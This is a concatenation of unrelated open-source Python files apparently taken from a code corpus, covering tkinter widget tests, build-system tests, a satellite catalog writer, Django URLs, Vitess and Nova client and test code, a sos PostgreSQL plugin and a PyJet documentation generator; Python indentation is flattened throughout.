item1 = self.tv.insert('', 'end', tags=['call'])
item2 = self.tv.insert('', 'end', tags=['call'])
self.tv.tag_bind('call', '<ButtonPress-1>',
lambda evt: events.append(1))
self.tv.tag_bind('call', '<ButtonRelease-1>',
lambda evt: events.append(2))
self.tv.pack()
self.tv.wait_visibility()
self.tv.update()
pos_y = set()
found = set()
for i in range(0, 100, 10):
if len(found) == 2: # item1 and item2 already found
break
item_id = self.tv.identify_row(i)
if item_id and item_id not in found:
pos_y.add(i)
found.add(item_id)
self.assertEqual(len(pos_y), 2) # item1 and item2 y pos
for y in pos_y:
simulate_mouse_click(self.tv, 0, y)
# by now there should be 4 things in the events list, since each
# item had a bind for two events that were simulated above
self.assertEqual(len(events), 4)
for evt in zip(events[::2], events[1::2]):
self.assertEqual(evt, (1, 2))
def test_tag_configure(self):
# Just testing parameter passing for now
self.assertRaises(TypeError, self.tv.tag_configure)
self.assertRaises(tkinter.TclError, self.tv.tag_configure,
'test', sky='blue')
self.tv.tag_configure('test', foreground='blue')
self.assertEqual(str(self.tv.tag_configure('test', 'foreground')),
'blue')
self.assertEqual(str(self.tv.tag_configure('test', foreground=None)),
'blue')
self.assertIsInstance(self.tv.tag_configure('test'), dict)
def test_tag_has(self):
item1 = self.tv.insert('', 'end', text='Item 1', tags=['tag1'])
item2 = self.tv.insert('', 'end', text='Item 2', tags=['tag2'])
self.assertRaises(TypeError, self.tv.tag_has)
self.assertRaises(TclError, self.tv.tag_has, 'tag1', 'non-existing')
self.assertTrue(self.tv.tag_has('tag1', item1))
self.assertFalse(self.tv.tag_has('tag1', item2))
self.assertFalse(self.tv.tag_has('tag2', item1))
self.assertTrue(self.tv.tag_has('tag2', item2))
self.assertFalse(self.tv.tag_has('tag3', item1))
self.assertFalse(self.tv.tag_has('tag3', item2))
self.assertEqual(self.tv.tag_has('tag1'), (item1,))
self.assertEqual(self.tv.tag_has('tag2'), (item2,))
self.assertEqual(self.tv.tag_has('tag3'), ())
@add_standard_options(StandardTtkOptionsTests)
class SeparatorTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'orient', 'style', 'takefocus',
# 'state'?
)
default_orient = 'horizontal'
def create(self, **kwargs):
return ttk.Separator(self.root, **kwargs)
@add_standard_options(StandardTtkOptionsTests)
class SizegripTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'style', 'takefocus',
# 'state'?
)
def create(self, **kwargs):
return ttk.Sizegrip(self.root, **kwargs)
tests_gui = (
ButtonTest, CheckbuttonTest, ComboboxTest, EntryTest,
FrameTest, LabelFrameTest, LabelTest, MenubuttonTest,
NotebookTest, PanedWindowTest, ProgressbarTest,
RadiobuttonTest, ScaleTest, ScrollbarTest, SeparatorTest,
SizegripTest, TreeviewTest, WidgetTest,
)
if __name__ == "__main__":
unittest.main()
|
albmarvil/The-Eternal-Sorrow | refs/heads/master | dependencies/luabind/boost-build/test/alternatives.py | 4 | #!/usr/bin/python
# Copyright 2003 Dave Abrahams
# Copyright 2003, 2006 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# Test main target alternatives.
from BoostBuild import Tester
from string import find
t = Tester()
# Test that basic alternatives selection works.
t.write("project-root.jam", " ")
t.write("Jamfile", """
exe a : a_empty.cpp ;
exe a : a.cpp : <variant>release ;
""")
t.write("a_empty.cpp", "")
t.write("a.cpp", "int main() { return 0; }\n")
t.run_build_system("release")
t.expect_addition("bin/$toolset/release/a.exe")
# Test that alternative selection works for ordinary
# properties, in particular user-defined.
t.write("project-root.jam", " ")
t.write("Jamfile", """
import feature ;
feature.feature X : off on : propagated ;
exe a : b.cpp ;
exe a : a.cpp : <X>on ;
""")
t.write("b.cpp", "int main() { return 0; }\n")
t.rm("bin")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/b.obj")
t.run_build_system("X=on")
t.expect_addition("bin/$toolset/debug/X-on/a.obj")
t.rm("bin")
# Test that everything works ok even with default
# build.
t.write("Jamfile", """
exe a : a_empty.cpp : <variant>release ;
exe a : a.cpp : <variant>debug ;
""")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/a.exe")
# Test that only properties which are in build request
# matters when selection alternative. IOW, alternative
# with <variant>release is better than one with
# <variant>debug when building release version.
t.write("Jamfile", """
exe a : a_empty.cpp : <variant>debug ;
exe a : a.cpp : <variant>release ;
""")
t.run_build_system("release")
t.expect_addition("bin/$toolset/release/a.exe")
# Test that free properties do not matter. We really don't
# want <cxxflags> property in build request to affect
# alternative selection.
t.write("Jamfile", """
exe a : a_empty.cpp : <variant>debug <define>FOO <include>BAR ;
exe a : a.cpp : <variant>release ;
""")
t.rm("bin/$toolset/release/a.exe")
t.run_build_system("release define=FOO")
t.expect_addition("bin/$toolset/release/a.exe")
# Test that abibuity is reported correctly
t.write("Jamfile", """
exe a : a_empty.cpp ;
exe a : a.cpp ;
""")
t.run_build_system("--no-error-backtrace", status=None)
t.fail_test(find(t.stdout(), "No best alternative") == -1)
# Another ambiguity test: two matches properties in one alternative are
# neither better nor worse than a single one in another alternative.
t.write("Jamfile", """
exe a : a_empty.cpp : <optimization>off <profiling>off ;
exe a : a.cpp : <debug-symbols>on ;
""")
t.run_build_system("--no-error-backtrace", status=None)
t.fail_test(find(t.stdout(), "No best alternative") == -1)
# Test that we can have alternative without sources
t.write("Jamfile", """
alias specific-sources ;
import feature ;
feature.extend os : MAGIC ;
alias specific-sources : b.cpp : <os>MAGIC ;
exe a : a.cpp specific-sources ;
""")
t.rm("bin")
t.run_build_system()
t.cleanup()
|
calincru/marble | refs/heads/master | tools/gen-sat-catalog/lib/ObjectCatalog.py | 9 | #
# This file is part of the Marble Virtual Globe.
#
# This program is free software licensed under the GNU LGPL. You can
# find a copy of this license in LICENSE.txt in the top directory of
# the source code.
#
# Copyright 2012 Rene Kuettner <rene@bitkanal.net>
#
from __future__ import print_function
from lxml import etree
from lxml.builder import ElementMaker
from SpaceObject import SpaceObject
class ObjectCatalog(object):
def __init__(self, filename, baseURL):
super(ObjectCatalog, self).__init__()
self._filename = filename;
self._baseURL = baseURL
self._file = None
self._open()
self._initXML();
def __del__(self):
self._close()
def add(self, space_obj, latest_vector):
#url = self._baseURL + "/" + space_obj.filename_prefix + '.txt'
#icon = self._baseURL + "/" + space_obj.filename_prefix + '.png'
satellite = self._E.satellite(
self._E.name(space_obj.name),
self._E.category(space_obj._category),
self._E.relatedBody(space_obj.related_body),
self._E.stateVector(
self._E.position(
x=str(latest_vector[1]),
y=str(latest_vector[2]),
z=str(latest_vector[3])
),
self._E.velocity(
x=str(latest_vector[4]),
y=str(latest_vector[5]),
z=str(latest_vector[6])
),
mjd=str(latest_vector[0])
),
#allvectors=url,
#icon=icon,
)
mission = self._E.mission()
if space_obj.mission_start is not None:
mission.append(self._E.start(str(space_obj.mission_start)))
if space_obj.mission_end is not None:
mission.append(self._E.end(str(space_obj.mission_end)))
if len(mission):
satellite.append(mission)
self._xml.append(satellite)
print(space_obj.name + " added to object catalog.")
def write(self):
print("Writing catalog to file: " + self._filename)
self._file.write(etree.tostring(self._xml,
pretty_print=True,
xml_declaration=True,
encoding='utf-8'))
def _initXML(self):
self._E = ElementMaker(
namespace="http://marble.kde.org/satellitecatalog",
nsmap={'msc' : "http://marble.kde.org/satellitecatalog"})
self._xml = self._E.MarbleSatelliteCatalog()
def _open(self):
self._file = open(self._filename, 'w+')
self._file.truncate()
def _close(self):
self._file.close()
|
bennylope/django-site-contacts | refs/heads/master | contact/urls.py | 1 | from django.conf.urls.defaults import patterns, url
from django.views.generic import TemplateView
from .views import SimpleContactView
urlpatterns = patterns('',
url(r'^$', view=SimpleContactView.as_view(), name="contact_form"),
url(r'^sent/$',
view=TemplateView.as_view(template_name="contact/contact_success.html"),
name="contact_success"),
)
|
tirsen/vitess | refs/heads/master | py/vtctl/vtctl_client.py | 12 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module defines the vtctl client interface.
"""
import logging
# mapping from protocol to python class. The protocol matches the string
# used by vtctlclient as a -vtctl_client_protocol parameter.
vtctl_client_conn_classes = dict()
def register_conn_class(protocol, c):
"""Used by implementations to register themselves.
Args:
protocol: short string to document the protocol.
c: class to register.
"""
vtctl_client_conn_classes[protocol] = c
def connect(protocol, *pargs, **kargs):
"""connect will return a dialed VtctlClient connection to a vtctl server.
Args:
protocol: the registered protocol to use.
*pargs: passed to the registered protocol __init__ method.
**kargs: passed to the registered protocol __init__ method.
Returns:
A dialed VtctlClient.
Raises:
ValueError: if the protocol is unknown.
"""
if protocol not in vtctl_client_conn_classes:
raise ValueError('Unknown vtctl protocol', protocol)
conn = vtctl_client_conn_classes[protocol](*pargs, **kargs)
conn.dial()
return conn
class Event(object):
"""Event is streamed by VtctlClient.
Eventually, we will just use the proto3 definition for logutil.proto/Event.
"""
INFO = 0
WARNING = 1
ERROR = 2
CONSOLE = 3
def __init__(self, time, level, file, line, value):
self.time = time
self.level = level
self.file = file
self.line = line
self.value = value
class VtctlClient(object):
"""VtctlClient is the interface for the vtctl client implementations.
All implementations must implement all these methods.
If something goes wrong with the connection, this object will be thrown out.
"""
def __init__(self, addr, timeout):
"""Initialize a vtctl connection.
Args:
addr: server address. Can be protocol dependent.
timeout: connection timeout (float, in seconds).
"""
pass
def dial(self):
"""Dial to the server. If successful, call close() to close the connection.
"""
pass
def close(self):
"""Close the connection. This object may be re-used again by calling dial().
"""
pass
def is_closed(self):
"""Checks the connection status.
Returns:
True if this connection is closed.
"""
pass
def execute_vtctl_command(self, args, action_timeout=30.0):
"""Executes a remote command on the vtctl server.
Args:
args: Command line to run.
action_timeout: total timeout for the action (float, in seconds).
Returns:
This is a generator method that yields Event objects.
"""
pass
def execute_vtctl_command(client, args, action_timeout=30.0,
info_to_debug=False):
"""This is a helper method that executes a remote vtctl command.
It logs the output to the logging module, and returns the console output.
Args:
client: VtctlClient object to use.
args: Command line to run.
action_timeout: total timeout for the action (float, in seconds).
info_to_debug: if set, changes the info messages to debug.
Returns:
The console output of the action.
"""
console_result = ''
for e in client.execute_vtctl_command(args, action_timeout=action_timeout):
if e.level == Event.INFO:
if info_to_debug:
logging.debug('%s', e.value)
else:
logging.info('%s', e.value)
elif e.level == Event.WARNING:
logging.warning('%s', e.value)
elif e.level == Event.ERROR:
logging.error('%s', e.value)
elif e.level == Event.CONSOLE:
console_result += e.value
return console_result
|
jdurbin/sandbox | refs/heads/master | python/heatmap/heatest_scipi.py | 1 | #!/usr/bin/env python
import scipy
import pylab
import scipy.cluster.hierarchy as sch
# Generate random features and distance matrix.
x = scipy.rand(40)
D = scipy.zeros([40,40])
for i in range(40):
for j in range(40):
D[i,j] = abs(x[i] - x[j])
# Compute and plot first dendrogram.
fig = pylab.figure(figsize=(8,8))
ax1 = fig.add_axes([0.09,0.1,0.2,0.6])
Y = sch.linkage(D, method='centroid')
Z1 = sch.dendrogram(Y, orientation='right')
ax1.set_xticks([])
ax1.set_yticks([])
# Compute and plot second dendrogram.
ax2 = fig.add_axes([0.3,0.71,0.6,0.2])
Y = sch.linkage(D, method='single')
Z2 = sch.dendrogram(Y)
ax2.set_xticks([])
ax2.set_yticks([])
# Plot distance matrix.
axmatrix = fig.add_axes([0.3,0.1,0.6,0.6])
idx1 = Z1['leaves']
idx2 = Z2['leaves']
D = D[idx1,:]
D = D[:,idx2]
im = axmatrix.matshow(D, aspect='auto', origin='lower', cmap=pylab.cm.YlGnBu)
axmatrix.set_xticks([])
axmatrix.set_yticks([])
# Plot colorbar.
axcolor = fig.add_axes([0.91,0.1,0.02,0.6])
pylab.colorbar(im, cax=axcolor)
fig.show()
fig.savefig('dendrogram.png') |
asm-products/cloudroutes-service | refs/heads/master | src/web/reactionforms/docker-restart-container/__init__.py | 2 | """Reactions form class for email notifications."""
from wtforms import SelectField, TextAreaField, TextField
from wtforms.validators import DataRequired, Optional
from ..base import BaseReactForm
class ReactForm(BaseReactForm): #pylint: disable=no-init
''' Class that creates an form for the reaction Docker: Start container '''
title = "Docker: Restart Container"
description = """
<p>This reaction will open an SSH connection to the specified host and restart a Docker container. If the container is running it will be stopped, and started; if the container is not running it will be started fresh.</p>
<p>The SSH connection is authenticated by an SSH key; it is recommended that you generate a unique SSH public/private key pair for this purpose. The <code>Gateway</code> field can be used to specify a bastion or "jump" host; this setting will cause the reaction to first SSH to the specified <code>Gateway</code> host and then SSH to the specified target host.</p>
"""
placeholders = BaseReactForm.placeholders
field_descriptions = BaseReactForm.descriptions
container_name = TextField(
"Container Name",
description=field_descriptions['docker']['container_name'],
validators=[DataRequired(message='Container Name is a required field')])
host_string = TextField(
"Target Host",
description=field_descriptions['ssh']['host_string'],
validators=[DataRequired(message='Target Host is a required field')])
gateway = TextField(
"Gateway Host",
description=field_descriptions['ssh']['gateway'],
validators=[Optional()])
username = TextField(
"Username",
description=field_descriptions['ssh']['username'],
validators=[DataRequired(message="Username is a required field")])
sshkey = TextAreaField(
"SSH Private Key",
description=field_descriptions['ssh']['sshkey'],
validators=[DataRequired(message='SSH Key is a required field')])
use_sudo = SelectField(
"Use Sudo",
description=field_descriptions['ssh']['use_sudo'],
choices=[('true', 'True'), ('false', 'False')],
validators=[DataRequired(message="Use Sudo is a required field")])
call_on = SelectField(
'Call On',
description=field_descriptions['callon'],
choices=[('false', 'False Monitors'), ('true', 'True Monitors')],
validators=[DataRequired(message='Call on is a required field.')])
if __name__ == '__main__':
pass
|
lmiccini/sos | refs/heads/master | sos/plugins/postgresql.py | 3 | # Copyright (C) 2014 Red Hat, Inc., Sandro Bonazzola <sbonazzo@redhat.com>
# Copyright (C) 2013 Chris J Arges <chris.j.arges@canonical.com>
# Copyright (C) 2012-2013 Red Hat, Inc., Bryn M. Reeves <bmr@redhat.com>
# Copyright (C) 2011 Red Hat, Inc., Jesse Jaggars <jjaggars@redhat.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
import os
import tempfile
from sos.plugins import Plugin, RedHatPlugin, UbuntuPlugin, DebianPlugin
from sos.utilities import find
class PostgreSQL(Plugin):
"""PostgreSQL RDBMS"""
plugin_name = "postgresql"
profiles = ('services',)
packages = ('postgresql',)
tmp_dir = None
password_warn_text = " (password visible in process listings)"
option_list = [
('pghome', 'PostgreSQL server home directory.', '', '/var/lib/pgsql'),
('username', 'username for pg_dump', '', 'postgres'),
('password', 'password for pg_dump' + password_warn_text, '', False),
('dbname', 'database name to dump for pg_dump', '', ''),
('dbhost', 'database hostname/IP (do not use unix socket)', '', ''),
('dbport', 'database server port number', '', '5432')
]
def pg_dump(self):
dest_file = os.path.join(self.tmp_dir, "sos_pgdump.tar")
# We're only modifying this for ourself and our children so there
# is no need to save and restore environment variables if the user
# decided to pass the password on the command line.
if self.get_option("password") is not False:
os.environ["PGPASSWORD"] = str(self.get_option("password"))
if self.get_option("dbhost"):
cmd = "pg_dump -U %s -h %s -p %s -w -f %s -F t %s" % (
self.get_option("username"),
self.get_option("dbhost"),
self.get_option("dbport"),
dest_file,
self.get_option("dbname")
)
else:
cmd = "pg_dump -C -U %s -w -f %s -F t %s " % (
self.get_option("username"),
dest_file,
self.get_option("dbname")
)
result = self.call_ext_prog(cmd)
if (result['status'] == 0):
self.add_copy_spec(dest_file)
else:
self._log_error(
"Unable to execute pg_dump. Error(%s)" % (result['output'])
)
self.add_alert(
"ERROR: Unable to execute pg_dump. Error(%s)" %
(result['output'])
)
def setup(self):
if self.get_option("dbname"):
if self.get_option("password") or "PGPASSWORD" in os.environ:
self.tmp_dir = tempfile.mkdtemp()
self.pg_dump()
else:
self.soslog.warning(
"password must be supplied to dump a database."
)
self.add_alert(
"WARN: password must be supplied to dump a database."
)
def postproc(self):
import shutil
if self.tmp_dir:
try:
shutil.rmtree(self.tmp_dir)
except shutil.Error:
self.soslog.exception(
"Unable to remove %s." % (self.tmp_dir)
)
self.add_alert("ERROR: Unable to remove %s." % (self.tmp_dir))
class RedHatPostgreSQL(PostgreSQL, RedHatPlugin):
def setup(self):
super(RedHatPostgreSQL, self).setup()
# Copy PostgreSQL log files.
for filename in find("*.log", self.get_option("pghome")):
self.add_copy_spec(filename)
# Copy PostgreSQL config files.
for filename in find("*.conf", self.get_option("pghome")):
self.add_copy_spec(filename)
self.add_copy_spec(
os.path.join(
self.get_option("pghome"),
"data",
"PG_VERSION"
)
)
self.add_copy_spec(
os.path.join(
self.get_option("pghome"),
"data",
"postmaster.opts"
)
)
class DebianPostgreSQL(PostgreSQL, DebianPlugin, UbuntuPlugin):
def setup(self):
super(DebianPostgreSQL, self).setup()
self.add_copy_spec([
"/var/log/postgresql/*.log",
"/etc/postgresql/*/main/*.conf",
"/var/lib/postgresql/*/main/PG_VERSION",
"/var/lib/postgresql/*/main/postmaster.opts"
])
# vim: et ts=4 sw=4
|
smart-techs/you-get | refs/heads/develop | src/you_get/cli_wrapper/player/wmp.py | 12133432 | |
elkingtonmcb/django | refs/heads/master | tests/gis_tests/data/rasters/__init__.py | 12133432 | |
feliperfranca/django-nonrel-example | refs/heads/master | django/conf/locale/es/__init__.py | 12133432 | |
ukanga/SickRage | refs/heads/master | lib/hachoir_core/event_handler.py | 188 | class EventHandler(object):
"""
Class to connect events to event handlers.
"""
def __init__(self):
self.handlers = {}
def connect(self, event_name, handler):
"""
Connect an event handler to an event. Append it to handlers list.
"""
try:
self.handlers[event_name].append(handler)
except KeyError:
self.handlers[event_name] = [handler]
def raiseEvent(self, event_name, *args):
"""
Raiser an event: call each handler for this event_name.
"""
if event_name not in self.handlers:
return
for handler in self.handlers[event_name]:
handler(*args)
|
atollena/commons | refs/heads/master | src/python/twitter/checkstyle/plugins/newlines.py | 14 | # ==================================================================================================
# Copyright 2014 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import ast
from ..common import CheckstylePlugin
class Newlines(CheckstylePlugin):
def iter_toplevel_defs(self):
for node in self.python_file.tree.body:
if isinstance(node, ast.FunctionDef) or isinstance(node, ast.ClassDef):
yield node
def previous_blank_lines(self, line_number):
blanks = 0
while line_number > 1:
line_number -= 1
line_value = self.python_file.lines[line_number].strip()
if line_value.startswith('#'):
continue
if line_value:
break
blanks += 1
return blanks
def nits(self):
for node in self.iter_toplevel_defs():
previous_blank_lines = self.previous_blank_lines(node.lineno)
if node.lineno > 2 and previous_blank_lines != 2:
yield self.error('T302', 'Expected 2 blank lines, found %d' % previous_blank_lines,
node)
for node in self.iter_ast_types(ast.ClassDef):
for subnode in node.body:
if not isinstance(subnode, ast.FunctionDef):
continue
previous_blank_lines = self.previous_blank_lines(subnode.lineno)
if subnode.lineno - node.lineno > 1 and previous_blank_lines != 1:
yield self.error('T301', 'Expected 1 blank lines, found %d' % previous_blank_lines,
subnode)
|
orbitfp7/nova | refs/heads/master | nova/tests/unit/api/openstack/compute/contrib/test_flavorextradata.py | 63 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from oslo_serialization import jsonutils
import webob
from nova.compute import flavors
from nova import test
from nova.tests.unit.api.openstack import fakes
def fake_get_flavor_by_flavor_id(flavorid, ctxt=None):
return {
'id': flavorid,
'flavorid': str(flavorid),
'root_gb': 1,
'ephemeral_gb': 1,
'name': u'test',
'deleted': False,
'created_at': datetime.datetime(2012, 1, 1, 1, 1, 1, 1),
'updated_at': None,
'memory_mb': 512,
'vcpus': 1,
'extra_specs': {},
'deleted_at': None,
'vcpu_weight': None,
'swap': 0,
'disabled': False,
}
def fake_get_all_flavors_sorted_list(context=None, inactive=False,
filters=None, sort_key='flavorid',
sort_dir='asc', limit=None, marker=None):
return [
fake_get_flavor_by_flavor_id(1),
fake_get_flavor_by_flavor_id(2)
]
class FlavorExtraDataTestV21(test.NoDBTestCase):
base_url = '/v2/fake/flavors'
def setUp(self):
super(FlavorExtraDataTestV21, self).setUp()
ext = ('nova.api.openstack.compute.contrib'
'.flavorextradata.Flavorextradata')
self.flags(osapi_compute_extension=[ext])
self.stubs.Set(flavors, 'get_flavor_by_flavor_id',
fake_get_flavor_by_flavor_id)
self.stubs.Set(flavors, 'get_all_flavors_sorted_list',
fake_get_all_flavors_sorted_list)
self._setup_app()
def _setup_app(self):
self.app = fakes.wsgi_app_v21(init_only=('flavors'))
def _verify_flavor_response(self, flavor, expected):
for key in expected:
self.assertEqual(flavor[key], expected[key])
def test_show(self):
expected = {
'flavor': {
'id': '1',
'name': 'test',
'ram': 512,
'vcpus': 1,
'disk': 1,
'OS-FLV-EXT-DATA:ephemeral': 1,
}
}
url = self.base_url + '/1'
req = webob.Request.blank(url)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
body = jsonutils.loads(res.body)
self._verify_flavor_response(body['flavor'], expected['flavor'])
def test_detail(self):
expected = [
{
'id': '1',
'name': 'test',
'ram': 512,
'vcpus': 1,
'disk': 1,
'OS-FLV-EXT-DATA:ephemeral': 1,
},
{
'id': '2',
'name': 'test',
'ram': 512,
'vcpus': 1,
'disk': 1,
'OS-FLV-EXT-DATA:ephemeral': 1,
},
]
url = self.base_url + '/detail'
req = webob.Request.blank(url)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
body = jsonutils.loads(res.body)
for i, flavor in enumerate(body['flavors']):
self._verify_flavor_response(flavor, expected[i])
class FlavorExtraDataTestV2(FlavorExtraDataTestV21):
def _setup_app(self):
self.app = fakes.wsgi_app(init_only=('flavors',))
|
abhmul/PyJet | refs/heads/master | docs/autogen.py | 1 | # -*- coding: utf-8 -*-
'''
General documentation architecture (Still more work to do here):
Home
Index
- Getting started
Getting started
FAQ
- Models
About PyJet models
explain designing and building a model
explain weight saving, weight loading
SLModel
- Layers
About PyJet layers
explain common layer functions: get_weights, set_weights, get_config
explain usage on pytorch tensors
Core Layers
Convolutional Layers
Pooling Layers
Recurrent Layers
Layer Wrappers
Writing your own PyJet layers
- Preprocessing
Image Preprocessing
Data
Losses
Metrics
Callbacks
Backend
Scikit-learn API
Utils
Contributing
'''
from __future__ import print_function
from __future__ import unicode_literals
import re
import inspect
import os
import shutil
from pyjet import utils
from pyjet import data
from pyjet import layers
from pyjet import callbacks
from pyjet import models
from pyjet import losses
from pyjet import metrics
from pyjet import backend
from pyjet import preprocessing
import sys
if sys.version[0] == '2':
reload(sys)
sys.setdefaultencoding('utf8')
EXCLUDE = {}
PAGES = [
{
'page': 'models/SLModel.md',
'functions': [
models.SLModel.cast_input_to_torch,
models.SLModel.cast_target_to_torch,
models.SLModel.cast_output_to_numpy,
models.SLModel.forward,
models.SLModel.train_on_batch,
models.SLModel.validate_on_batch,
models.SLModel.predict_on_batch,
models.SLModel.fit_generator,
models.SLModel.validate_generator,
models.SLModel.predict_generator,
models.SLModel.load_state,
models.SLModel.save_state,
],
},
{
'page': 'layers/core.md',
'classes': [
layers.FullyConnected,
layers.Flatten,
],
},
{
'page': 'layers/convolutional.md',
'classes': [
layers.Conv1D,
layers.Conv2D,
layers.Conv3D,
],
},
# {
# 'page': 'layers/pooling.md',
# 'classes': [
# ],
# },
{
'page': 'layers/recurrent.md',
'classes': [
layers.SimpleRNN,
layers.GRU,
layers.LSTM,
],
},
{
'page': 'layers/functions.md',
'all_module_functions': [layers.functions]
},
{
'page': 'metrics.md',
'all_module_functions': [metrics],
},
{
'page': 'losses.md',
'all_module_functions': [losses],
},
{
'page': 'callbacks.md',
'all_module_classes': [callbacks],
},
{
'page': 'backend.md',
'all_module_functions': [backend],
},
{
'page': 'preprocessing/image.md',
'classes': [
preprocessing.image.ImageDataGenerator,
],
'functions': [
preprocessing.image.ImageDataGenerator.standardize,
preprocessing.image.ImageDataGenerator.random_transform,
]
},
{
'page': 'data.md',
'classes': [
data.Dataset,
data.NpDataset,
data.HDF5Dataset,
data.TorchDataset,
data.DatasetGenerator,
]
}
# {
# 'page': 'utils.md',
# },
]
ROOT = 'http://pyjet.io/'
def get_earliest_class_that_defined_member(member, cls):
ancestors = get_classes_ancestors([cls])
result = None
for ancestor in ancestors:
if member in dir(ancestor):
result = ancestor
if not result:
return cls
return result
def get_classes_ancestors(classes):
ancestors = []
for cls in classes:
ancestors += cls.__bases__
filtered_ancestors = []
for ancestor in ancestors:
if ancestor.__name__ in ['object']:
continue
filtered_ancestors.append(ancestor)
if filtered_ancestors:
return filtered_ancestors + get_classes_ancestors(filtered_ancestors)
else:
return filtered_ancestors
def get_function_signature(function, method=True):
wrapped = getattr(function, '_original_function', None)
if wrapped is None:
signature = inspect.getargspec(function)
else:
signature = inspect.getargspec(wrapped)
defaults = signature.defaults
if method:
args = signature.args[1:]
else:
args = signature.args
if defaults:
kwargs = zip(args[-len(defaults):], defaults)
args = args[:-len(defaults)]
else:
kwargs = []
st = '%s.%s(' % (function.__module__, function.__name__)
for a in args:
st += str(a) + ', '
for a, v in kwargs:
if isinstance(v, str):
v = '\'' + v + '\''
st += str(a) + '=' + str(v) + ', '
if kwargs or args:
signature = st[:-2] + ')'
else:
signature = st + ')'
if not method:
# Prepend the module name.
signature = function.__module__ + '.' + signature
return post_process_signature(signature)
def get_class_signature(cls):
try:
class_signature = get_function_signature(cls.__init__)
class_signature = class_signature.replace('__init__', cls.__name__)
except (TypeError, AttributeError):
# in case the class inherits from object and does not
# define __init__
class_signature = cls.__module__ + '.' + cls.__name__ + '()'
return post_process_signature(class_signature)
def post_process_signature(signature):
parts = re.split('\.(?!\d)', signature)
if len(parts) >= 4:
if parts[1] == 'layers':
signature = 'pyjet.layers.' + '.'.join(parts[3:])
if parts[1] == 'utils':
signature = 'pyjet.utils.' + '.'.join(parts[3:])
if parts[1] == 'backend':
signature = 'pyjet.backend.' + '.'.join(parts[3:])
return signature
def class_to_docs_link(cls):
module_name = cls.__module__
assert module_name[:6] == 'pyjet.'
module_name = module_name[6:]
link = ROOT + module_name.replace('.', '/') + '#' + cls.__name__.lower()
return link
def class_to_source_link(cls):
module_name = cls.__module__
assert module_name[:6] == 'pyjet.'
path = module_name.replace('.', '/')
path += '.py'
line = inspect.getsourcelines(cls)[-1]
link = ('https://github.com/PyJet/'
'tree/master/pyjet/' + path + '#L' + str(line))
return '[[source]](' + link + ')'
def code_snippet(snippet):
result = '```python\n'
result += snippet + '\n'
result += '```\n'
return result
def count_leading_spaces(s):
ws = re.search('\S', s)
if ws:
return ws.start()
else:
return 0
def process_docstring(docstring):
# First, extract code blocks and process them.
code_blocks = []
if '```' in docstring:
tmp = docstring[:]
while '```' in tmp:
tmp = tmp[tmp.find('```'):]
index = tmp[3:].find('```') + 6
snippet = tmp[:index]
# Place marker in docstring for later reinjection.
docstring = docstring.replace(
snippet, '$CODE_BLOCK_%d' % len(code_blocks))
snippet_lines = snippet.split('\n')
# Remove leading spaces.
num_leading_spaces = snippet_lines[-1].find('`')
snippet_lines = ([snippet_lines[0]] +
[line[num_leading_spaces:]
for line in snippet_lines[1:]])
# Most code snippets have 3 or 4 more leading spaces
# on inner lines, but not all. Remove them.
inner_lines = snippet_lines[1:-1]
leading_spaces = None
for line in inner_lines:
if not line or line[0] == '\n':
continue
spaces = count_leading_spaces(line)
if leading_spaces is None:
leading_spaces = spaces
if spaces < leading_spaces:
leading_spaces = spaces
if leading_spaces:
snippet_lines = ([snippet_lines[0]] +
[line[leading_spaces:]
for line in snippet_lines[1:-1]] +
[snippet_lines[-1]])
snippet = '\n'.join(snippet_lines)
code_blocks.append(snippet)
tmp = tmp[index:]
# Format docstring section titles.
docstring = re.sub(r'\n(\s+)# (.*)\n',
r'\n\1__\2__\n\n',
docstring)
# Format docstring lists.
docstring = re.sub(r' ([^\s\\\(]+):(.*)\n',
r' - __\1__:\2\n',
docstring)
# Strip all leading spaces.
lines = docstring.split('\n')
docstring = '\n'.join([line.lstrip(' ') for line in lines])
# Reinject code blocks.
for i, code_block in enumerate(code_blocks):
docstring = docstring.replace(
'$CODE_BLOCK_%d' % i, code_block)
return docstring
print('Cleaning up existing sources directory.')
if os.path.exists('sources'):
shutil.rmtree('sources')
print('Populating sources directory with templates.')
for subdir, dirs, fnames in os.walk('templates'):
for fname in fnames:
new_subdir = subdir.replace('templates', 'sources')
if not os.path.exists(new_subdir):
os.makedirs(new_subdir)
